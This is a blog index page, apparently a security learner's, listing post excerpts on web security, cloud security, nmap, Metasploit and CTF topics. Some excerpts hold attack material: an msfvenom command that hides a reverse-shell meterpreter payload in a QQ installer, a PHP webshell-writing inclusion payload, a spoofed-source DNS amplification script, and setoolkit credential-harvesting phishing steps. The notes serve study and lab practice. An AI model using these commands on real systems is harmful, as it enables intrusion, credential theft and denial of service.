- 博客(133)
- 资源 (12)
- 收藏
- 关注
原创 跋20230325
博文都是笔者在学习过程中所记录的笔记,一些结论只代表笔者当时写这篇文章时的想法,不能保证百分百正确。加上现在的岗位和技术越来越不相关,以后大概率也不会登录csdn来查找资料。如果您发现了有误的地方,可以在评论区指出来,给其他学习的人提个醒,有问题也可以问那些近期活跃的博主。很久没有登录csdn,突然上号一次发现n多的评论和私信,时间跨度从2021年到2023年。
2023-03-25 14:21:15 210 1
原创 免费下论文及查重投稿的10来个方法
目录1.超星期刊2.库问搜索3. 全国图书馆参考咨询联盟4.百度学术5.爱学术6.谷歌学术7.OA图书馆8.Idata9.中国国家图书馆10.湖南图书馆——五颗星眨眼间就快毕业了,是时候准备写论文了。但是随着校园网的涨价,进知网也成了件奢侈的事。或许几年后,不知知网会成为正常的操作。好了,废话少说,开始白嫖论文之路以下都是在火狐浏览器中演示的,如果是360、IE、谷歌浏览器,可能会有些许不同操作。写个爬虫——这是不可能的,面向监狱编程可不是说笑的。1.超星期刊如果你刷过超星尔雅通识课,而且学生
2020-09-09 01:06:06 12209 25
原创 2020年总结
已经2021年了。对2020年,有一些话想说,但不知从何说起。前言很小就对‘黑客’感兴趣,于是大学时我的专业是软件工程——填志愿时根本不知道还有网络安全、信息安全这种专业,所以选择了一些类似软件工程这种听起来就和电脑有关的专业。浑浑噩噩过了一年多。大二下学期,突然接触到了CTF比赛,然后久违的‘黑客梦’又出来了。于是决定“洗心革面,重新做人”,开始找视频,找网站,找文章开始自学。二月2020年2月,得到消息可能要在家学习两个月。两个月,这么长一段时间让我自学,当初心里是害怕的,因为我知道自己的自
2021-01-12 00:17:45 5107 9
原创 W面试记
目录前言1.穿着2.简历表3.自我介绍4.面试123567891011121314尾声前言前不久博主的一个朋友W去面试某家公司的实习生岗位,因为W是第一次面试,所以发挥的并不好。今天W跟我分享了他的面试过程,为了在以后的面试中不踩坑,便有了此文。因为时间有点久远,W的回忆出现了混乱,所以部分内容经过了我的艺术加工。以下皆是W的叙述,为了生动形象,能更具体地体会W的心情,这里我用第一人称写1.穿着去面试的时候,我里面穿一件T恤,外面披一件外套,然后裤子就一条牛仔裤。看了其他和我一起去面试的人,大
2020-10-24 09:15:13 6215 21
原创 OWASP Top 10
目录什么是OWASP?TOP 101.注入说明产生情况危害防范2.失效身份验证和会话管理说明产生情况危害防范3.敏感信息泄露说明产生情况危害防范4.XML外部实体注入攻击(XXE)说明产生情况危害防范5.存取控制中断说明产生情况危害防范6.安全性错误配置说明产生情况危害防范7.跨站脚本攻击(XSS)说明产生情况危害防范8.不安全的反序列化说明产生情况危害防范9.使用具有已知漏洞的组件说明产生情况危害防范10.日志记录和监控不足说明产生情况危害防范什么是OWASP?它的全称是 Open Web Appli
2020-10-15 08:42:55 3019 6
转载 渗透测试 面试笔试题
Powered By 行云博客(https://www.xy586.top)原创文章,转载请附上原文出处链接和本声明。原文链接:https://blog.csdn.net/qq_41679358/article/details/109019491一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段
2020-10-12 20:12:37 47267 8
原创 windows 认证机制
Windwos密码hash早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,称之为NTLM。现在已经有了更新的NTLM v2以及Kerberos验证体系。windows加密过的密码口令,我们称之为hash,windows的系统密码hash默认情况下一般有两部分组成:LM-hash,NTLM-hash 。NTLM hash在windows系统中比较常见的是从系统导出
2020-10-09 10:09:38 4922 5
原创 阿里云云安全理工程师认证 部分题目 ACA
(笔者还没开始考,题目来源于百度)1.如果企业云上的架构选择的是All in one的部署方式,以下哪种安全注意事项是不需要考虑的?A .云实例之间的数据传输安全B .登陆安全C .应用访问攻击D .网络攻击风险2.口令暴力破解主要是以哪些协议为主来发动攻击的?(正确答案的数量:2个)A .HTTPB .HTTPSC .SSHD .RDP3.为了提升云上账号的安全性,建议用户在管理云服务时遵循一些基本的原则,以下哪个选项不属于建议的指导原则?A .匿名登录B .登录验证C .
2020-10-05 22:56:01 3696 4
原创 云上安全综合管理
目录课程目标1.安全管理概述安全管理的重要性云上安全管理的六大措施阿里云上安全管理三字经云上安全管理的注意事项云上安全远程管理的最佳实践:VPN+堡垒机阿里云的堡垒机服务2.阿里云上监控服务云监控的使用场景云监控的价值态势感知态势感知的使用场景态势感知的价值3.云上安全监控和管理的实践读懂常见的风险报警自定义的报警规则用好监控大屏课程目标1.安全管理概述安全管理的重要性云上安全管理的六大措施阿里云上安全管理三字经云上安全管理的注意事项云上安全远程管理的最佳实践:VPN+堡垒机阿里
2020-10-05 21:40:40 1690
原创 云上应用安全
目录课程介绍1.WEB应用安全概述web应用安全问题示例web应用安全问题OWASP十大安全漏洞列表(2017年)web组成部分及web安全分类应用安全防护方法应用安全防护工具2.通过阿里云WAF保护应用安全什么是阿里云WAF?阿里云WAF的产品功能阿里云WAF的竞争优势1.资源能力2.数据模型阿里云WAF工作原理阿里云WAF应用防火墙安全监测流程阿里云WAF接入方法WAF的不同版本3.SQL注入及防护什么是SQL注入攻击?SQL注入攻击的现象SQL注入的过程SQL注入产生的原因SQL注入攻击语句举例SQL
2020-10-05 21:06:45 2990 2
原创 云上数据安全
目录课程介绍1.数据安全概述常见的数据安全问题数据本身及数据防护的安全阿里云的数据安全防护2.数据备份、恢复和容灾常见的不同级别的备份方法云服务器ECS快照云数据库RDS备份与恢复云数据库RDS数据导入、导出云数据库RDS主备实例、灾备实例云储存OSS多副本&异地备份3.数据加密常见加密算法应用1.对称加密算法2.非对称加密算法3.哈希算法如何选择加密算法和秘钥云数据库加密存储——TDE透明数据加密云存储OSS加密存储——客户端加密保护数据云存储OSS数据完整性验证阿里云加密服务4.数据传输安全数据
2020-10-05 19:37:37 3342 6
原创 云上网络安全
目录课程目标1.网络安全概述TCP/IP协议网络通信的五元组常见的网络安全问题各种网络攻击安全责任分担模型2.网络防火墙的使用安全组介绍安全组功能创建安全组配置规则安全组应用3.安全专有网络VPCVPC原理VPC与经典网络VPC功能1、自由可控的网络2、公网出入弹性公网IP与NAT网关的对比3、私网互联4.DDoS攻击介绍与防护措施5.如何用好阿里云的基础DDoS防护6.通过高防IP抵御大规模DDoS攻击课程目标1.网络安全概述TCP/IP协议网络通信的五元组源IP、源端口、协议、目标IP、.
2020-10-05 16:34:30 3879 2
原创 云上服务器安全
目录课程目标服务器面临的安全挑战2016年服务器安全健康状况服务器面临的安全挑战1.高危漏洞攻击2.开放端口攻击3.恶意木马攻击服务器安全管理123服务器安全管理的五种方式1.及时打补丁2.修改默认的账号密码3.启动防火墙4.关闭不必要的服务、端口5.检测服务器日志通过安骑士发现登录风险阿里云安骑士的主要功能阿里云安骑士架构1.异地登录2.暴力破解3.登录IP白名单通过安骑士修复常见漏洞常见漏洞简介漏洞管理流程安骑士漏洞管理主要功能软件漏洞CMS漏洞基线检测安骑士漏洞管理的应用场景课程目标服务器面临的
2020-10-04 20:56:22 1856
原创 云平台使用安全
目录1.典型IT系统架构介绍IT基础架构演讲的趋势传统IT 与云计算的区别云计算的三种服务方式企业云上常见架构2.信息安全现状和形势重点安全事件回顾阿里云的安全监测报告阿里云安全态势分析3.IT系统风控构成什么是风险?IT系统风险构成按照等保的划分维度云上的安全服务方式云上安全防护的关键点注意事项应用与数据分离应用集群部署动静资源分离云计算面临的主要安全威胁产生安全风险的主要原因阿里云安全解决方案阿里云的服务器安全防护阿里云的网络安全防护阿里云的数据安全防护阿里云的应用安全防护阿里云的监控管理安全法概要背.
2020-10-04 19:07:47 2586 1
原创 windows域的创建
建域win+R输入dcpromo然后就是安装二进制文件直接点击下一步新建域输入下一步下一步选择dns服务器,然后下一步
2020-10-04 06:47:46 4621 2
原创 内网渗透
目录什么是外网渗透什么是内网渗透域工作组什么是外网渗透外网更侧重于找漏洞寻找突破口举个简单的例子:把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。想要进入超市,这个时候我们要寻找一下超市防守不到位的地方:比如是不是窗户没关,保安是不是半夜十二点就会开始划水,大门是不是没锁……综合素质很强的白帽会收集这些“漏洞”,综合多方因素,利用天时地利人和,突破限制,闯入“内网”。所以,外网渗透阶段,考验的是白帽综合能力,想要进入内网是一个很难的过程。什么是内网渗透而内网更侧重
2020-10-04 06:46:57 10088 16
原创 代码审计
定向功能分析法1.程序初始安装2.站点信息泄露3.文件上传4.文件管理5.登录认证6.数据库备份恢复注册一个用户,用户名是个一句话木马,然后将数据库导出备份,用户名7.找回密码8.验证码找到加密的密码,偏移量,生成同样的token。或者找到cookie的生成规律,然后cookie登录...
2020-10-04 06:44:55 6829 6
原创 协议攻击(二)
HTTP慢速攻击也叫slow http attack,是一种DoS攻击的方式。由于HTTP请求底层使用TCP网络连接进行会话,因此如果中间件对会话超时时间设置不合理,并且HTTP在发送请求的时候采用慢速发HTTP请求,就会导致占用一个HTTP连接会话。如果发送大量慢速的HTTP包就会导致拒绝服务攻击DoS。Slow headers(也称slowloris):Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部,Web服务器再没接收到2个连续的\r\n时,会认为客户端没有发送完头部,而持续的等等
2020-10-02 03:53:05 2274 3
原创 协议攻击(一)
目录1.IP源地址欺骗攻击(dos攻击)原理:实验环境步骤1.2 dos攻击2.ARP欺骗中间人攻击原理实验环境步骤1.IP源地址欺骗攻击(dos攻击)原理:客户端(kali)基于tcp第一次握手,给服务器端(centos)发送了大量标记位为SYN的包。服务器端收到来自客户端的syn包后,对源ip返回标记位为syn_ack的包,这是第二次握手。由于源ip是伪造的,所以返回的syn_ack包发送不到正确的地方,更不要说得到回应了。所以服务器端一直是SYN-RCVD阶段。实验环境靶机:cento
2020-10-02 03:52:45 6770 5
原创 拒绝服务攻击
dosddos定义rdosdrdos方法snmp放大100多倍dns 放大300多倍ntp 放大800多倍mem 11211端口 同时支持tcp11211与udp11211 理论上可以放大40万倍,实际上7万倍dnspython脚本from scapy.all import *import threadingdef test(): a = IP(dst='8.8.8.8',src='172.16.11.18') b = b = U
2020-10-02 03:51:48 2947
原创 流量转发映射
iptablenginxproxysocktssshtls正向代理内网请求代理服务器访问公网反向代理内网把自己的东西放到公网上去,然后别人从公网访问比如代理服务器的80端口只能从内网访问,8080端口能从公网访问。内网将数据放到代理的80端口,然后代理服务器将80端口的数据转发到8080端口,公网直接访问8080端口。sshcentos ip :172.16.11.78kali ip:172.16.11.83首先,centos开启web服务这里在网站根目录下新建一个123
2020-09-29 10:07:44 5000
原创 Windows系统组件漏洞
目录什么是组件1.CVE-2017-8464原理复现环境部署远程监听2.MS11_003 溢出漏洞原理复现下一步提权3.CVE-2019-07084.CVE-2020-0796(永恒之黑)5.…………………………什么是组件组件一般都是系统自带都有的, 如:WINXP或WIN2000它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。具体方式:控制面板--添加或删除程序--添加/删除组件1.CVE-2017-8464原理Windows系统使用二进制解析 .LNK文件,当恶意二进
2020-09-19 18:54:34 2929
原创 MSF基础与应用
什么是MSF?Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。因此MSF的更新使用k
2020-09-19 17:00:58 4733
原创 nmap
目录nmap端口状态解析nmap-D 伪造ip-g 伪造端口-A 详细扫描-sVscan 仔细扫描-iL-iroracle-sid-brute.nsenmap端口状态解析open : 应用程序在该端口接收 TCP 连接或者 UDP 报文。 closed :关闭的端口对于nmap也是可访问的, 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。filtered :由于包过滤阻止探测报文到达端口,nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备,路由规则 或者主机上的软件防火墙
2020-09-19 16:26:46 1781 1
原创 常用端口号及服务
端口号的范围是从1~65535分为3大类:1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。2) 注册端口(Registered Ports):从1024到49151,它们松散地绑定于一些服务。但是这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到655
2020-09-19 15:43:16 4533
原创 珍惜数据,远离钓鱼
首先,进入kali输入:setoolkit选择1,社会工程攻击下一步,选择2,网站攻击载体接下来还是选择3,凭证收割机然后,又是选择2,站点克隆器然后回车,输入你想克隆的网站,但是注意,只能克隆http的,不能克隆https的,去掉s就行了...
2020-09-17 22:31:35 5786 6
原创 msf之木马程序
捆绑木马这里使用的是Kali linux虚拟机攻击机ip是192.168.0.108靶机ip是192.168.177.134生成木马文件首先上传一个正常的安装包到kali里面我这里下了一个QQ把它上传到了root/dy/路径下然后开始捆绑msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe-p:指定后面的pa
2020-09-15 21:46:03 11994 31
原创 社会工程学
目录什么是社会工程学?基础信息怎么拿到基础信息?(常见的社会工程学攻击)1.直接索取 (Direct Approach) — 直接向目标人员索取所需信息2.个人冒充3.反向社会工程4.邮件利用5.钓鱼技术 (Phishing) — 模仿合法站点的非法站点6.域欺骗技术 (Pharming)7.非交互式技术8.多学科交叉技术技术强化社会工程学是黑客米特尼克悔改后在《欺骗的艺术》中所提出的,是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。什么是社会工程学?在
2020-09-13 01:38:02 15876 7
原创 逻辑漏洞之无密码登录(vlcms)
目录漏洞原理演示逻辑图靶场cms下载漏洞原理无密码登录,说到这个,大家可能想到的是下面这几种方法。一种是用第三方账户,比如使用QQ登录,使用微博登录。一种就是邮箱登录,比如只要输入email地址,然后网站就会给你的邮箱发一条邮件,邮件里有条链接,你只要点击链接就能登录。还有就是扫码登录,比如手机QQ扫码登录电脑QQ。……但是这些并不是本文所介绍的,因为这些是正常的无密码登录。所谓无密码登录漏洞,我觉得应该是:原本需要输入账号、密码并验证其符合要求才能正常登录的地方,因为程序的不严谨,造成不输
2020-09-06 11:57:34 4004 3
原创 逻辑漏洞之密码找回漏洞(semcms)
目录什么是密码找回漏洞一般流程可能产生该漏洞的情况脑洞图1.用户凭证暴力破解2.返回凭证3.邮箱弱token4.用户凭证有效性5.重新绑定6.服务器验证7.用户身份验证8.找回步骤9.本地验证10.注入11.Token生成12.注册覆盖13.session覆盖演示暴破验证码找回密码更改id号修改admin密码靶场cms下载什么是密码找回漏洞利用漏洞修改他人帐号密码,甚至修改管理员的密码。一般流程1 首先尝试正常找回密码流程,选择不同的找回方式,记录所有数据包2 分析数据包,找到敏感部分3
2020-09-06 11:55:15 6926 7
原创 逻辑漏洞之越权、支付漏洞
目录逻辑漏洞Web安全渗透三大核心方向输入输出登录体系、权限认证业务逻辑漏洞分类1、登录体系安全暴力破解cookie安全加密测试登录验证绕过任意注册2、业务一致性安全手机号篡改邮箱和用户名更改订单ID更改商品编号更改用户ID篡改流程顺序3、业务数据篡改金额数据篡改商品数量篡改最大数限制突破金额&优惠组合修改4、密码找回漏洞分析数据包,定位敏感信息分析找回机制修改数据包验证任意密码找回5、验证码突破暴力破解时间、次数突破回显测试验证码绕过测试验证检验机制猜解6、会话权限安全未授权访问水平&垂直
2020-09-06 11:52:38 8032 4
原创 XXE注入漏洞
什么是XML要想清楚XXE漏洞,首先要了解XMLXML 可扩展标记语言(EXtensible Markup Language)。它是一门用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型。XML 很像HTML,但是标签没有被预定义,需要自行定义标签。它的文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它的设计宗旨是传输数据,而不是显示数据。php版本大于5.4.45的默认不解析外部实体传参实体:有%一般实体:无%xxe漏洞与ssrf漏洞相似虽然场景不同,
2020-09-03 19:15:51 3591
原创 kali安装webdav服务
1.安装apacheapt-get install -y apache22.启动apahesystemctl start apache2 lsof -i:80 查看80端口是否被占用,即验证apache2服务是否开启成功3a2enmod dav //启用模块a2enmod dav_fs //启用共享4.mkdir -p /var/www/html/webdav //创建共享目录cd /var/www/html/webdav //进入共享目.
2020-08-31 01:56:36 2269 1
原创 php反序列化漏洞
序列化:object的数据类型转换成数据串object类型不能被存储反序列化:数据串的数据类型转换成object在PHP应用中,序列化,反序列化一般用作缓存对象函数魔术函数__call()是在对象上下文中调用不可访问的方法时触发__callStatic()是在静态上下文中调用不可访问的方法时触发。__get()用于从不可访问的属性读取数据。__set()用于将数据写入不可访问的属性。__toString()方法允许一个类决定如何处理像一个字符串时它将如何反应。__sleep()
2020-08-31 01:55:13 2465 9
原创 未授权访问漏洞——以redis为例
目录ssh免密登录客户端1.客户端生成公私钥2.上传公钥到服务器端服务器端3.更改authorized_keys文件权限客户端4.免密登录服务器端redisredis介绍本地漏洞环境搭建修改配置文件,使可以远程访问启动redis-server攻击测试ssh免密登录客户端1.客户端生成公私钥cd ~ //进入家目录 ssh-keygen -t rsa //生成公私钥中间连续三次回车即可,完成后会生成一个.ssh隐藏文件在.ssh/目录下,会新生成两
2020-08-29 18:49:35 3674
原创 ssh秘钥登录
ssh免密登录客户端1.客户端生成公私钥cd ~ //进入家目录 ssh-keygen -t rsa //生成公私钥中间连续三次回车即可,完成后会生成一个.ssh隐藏文件在.ssh/目录下,会新生成两个文件: id_rsa 和 id_rsa.pubcd .ssh ls 2.上传公钥到服务器端ssh-copy-id admin@47.*.*.232 //47.*.*.232 是服务器端的ip,ad
2020-08-29 17:09:49 3063 1
原创 redis-cli 未找到命令的一个解决方式
进入redis的安装路径下将src目录里的redis-cli文件复制到/usr/local/bin/路径中cp src/redis-cli /usr/local/bin/
2020-08-26 19:00:41 8472
原创 任意文件包含漏洞(3)——实战xhcms
又是一个有漏洞的cms编码了127.0.0.1/xhcms/?r=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>’);?>抓包改
2020-08-23 18:05:54 3910 10
ResourceHacker_v5.1.7_Stable_Chs_WangSu.zip
2020-09-14
pikachu.rar
2020-08-24
msyql安装包.zip
2020-07-15
小葵多功能转换工具.zip
2020-07-11
OS部分命令总结.xlsx
2020-07-04
DVWA(Damn Vulnerable Web Application)
2020-02-26
Sql注入平台.zip
2020-02-21
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人